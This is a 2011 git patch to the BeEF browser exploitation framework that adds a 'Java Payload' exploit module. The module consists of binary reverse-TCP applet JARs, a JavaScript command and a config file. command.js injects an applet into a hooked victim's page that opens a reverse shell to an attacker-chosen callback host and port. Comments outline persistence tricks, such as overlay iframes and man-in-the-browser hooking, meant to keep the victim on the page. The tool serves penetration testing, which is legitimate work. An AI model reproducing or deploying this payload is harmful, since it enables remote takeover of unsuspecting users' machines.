From c4d5b30b608c43e2c519411de7efd454a09f0374 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@b87d56ec-f9c0-11de-8c8a-61c5e9addfc9>
Date: Tue, 1 Nov 2011 12:06:58 +0000
Subject: [PATCH] (Fixes issue 434) First works with the malicious Java applet.
 Tons of work to come in the next releases (OMG) :-)

git-svn-id: https://beef.googlecode.com/svn/trunk@1387 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
---
 .../java_payload/AppletReverseTCP-0.2.jar     | Bin 0 -> 4781 bytes
 .../java_payload/AppletReverseTCP-0.3rc1.jar  | Bin 0 -> 6029 bytes
 modules/exploits/java_payload/command.js      |  54 ++++++++++++++++++
 modules/exploits/java_payload/config.yaml     |  26 +++++++++
 modules/exploits/java_payload/module.rb       |  37 ++++++++++++
 5 files changed, 117 insertions(+)
 create mode 100644 modules/exploits/java_payload/AppletReverseTCP-0.2.jar
 create mode 100644 modules/exploits/java_payload/AppletReverseTCP-0.3rc1.jar
 create mode 100755 modules/exploits/java_payload/command.js
 create mode 100755 modules/exploits/java_payload/config.yaml
 create mode 100755 modules/exploits/java_payload/module.rb

diff --git a/modules/exploits/java_payload/AppletReverseTCP-0.2.jar b/modules/exploits/java_payload/AppletReverseTCP-0.2.jar
new file mode 100644
index 0000000000000000000000000000000000000000..8959c4ed9cac88cfb8aa113d7df2d38cb226e3a4
GIT binary patch
literal 4781
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
My!ndDWVfe(0SZe|?*IS*

literal 0
HcmV?d00001

diff --git a/modules/exploits/java_payload/AppletReverseTCP-0.3rc1.jar b/modules/exploits/java_payload/AppletReverseTCP-0.3rc1.jar
new file mode 100644
index 0000000000000000000000000000000000000000..2c38c932dcd778cdb93fa0cafae1fde480527c10
GIT binary patch
literal 6029
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

literal 0
HcmV?d00001

diff --git a/modules/exploits/java_payload/command.js b/modules/exploits/java_payload/command.js
new file mode 100755
index 000000000..6a522237a
--- /dev/null
+++ b/modules/exploits/java_payload/command.js
@@ -0,0 +1,54 @@
+//
+//   Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+    var conn = '<%= @conn %>';
+    var cbHost = '<%= @cbHost %>';
+    var cbPort = '<%= @cbPort %>';
+    var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/anti.jar';
+    var applet_id = '<%= @applet_id %>';
+    var applet_name = '<%= @applet_name %>';
+
+    beef.dom.attachApplet(applet_id, applet_name, 'javapayload.loader.AppletLoader',
+        applet_archive, [{'argc':'5', 'arg0':'ReverseTCP', 'arg1':cbHost, 'arg2':cbPort, 'arg3':'--', 'arg4':'JSh'}]);
+
+
+    //TODO: modify the applet in a way we can call a method from it, or create a Javascript variable in the page (to know the applet has started).
+    //TODO: after that, every N seconds we'll check if the user RUN the applet, otherwise we remove the applet and inject another one.
+
+
+//TODO:     =========== persistence techniques ===========
+//    the victim must stay on the page while the applet is running. we don't want to use hybrid techniques to
+//    download platform dependent executable (i.e. meterpreter) and then kill the applet.
+//    we have 2 options:
+//    1. use the MITB code (currently doesn't work on IE)
+//    2. create an overlay iFrame while having the applet runnin in the background
+//
+//    1. setTimeout(beef.dom.createIframe('fullscreen', 'get', {'src':"<%= @iFrameSrc %>", 'id':"overlayiframe", 'name':"overlayiframe"}, {}, null), 4000);
+//    2. beef.mitb.init("<%= @command_url %>", <%= @command_id %>);
+//		var MITBload = setInterval(function(){
+//				if(beef.pageIsLoaded){
+//					clearInterval(MITBload);
+//					beef.mitb.hook();
+//				}
+//			}, 100);
+
+
+
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Applet with id[' + applet_id + '] added to the DOM.');
+
+
+});
diff --git a/modules/exploits/java_payload/config.yaml b/modules/exploits/java_payload/config.yaml
new file mode 100755
index 000000000..468dd9228
--- /dev/null
+++ b/modules/exploits/java_payload/config.yaml
@@ -0,0 +1,26 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        java_payload:
+            enable: true
+            category: "Exploits"
+            name: "Java Payload"
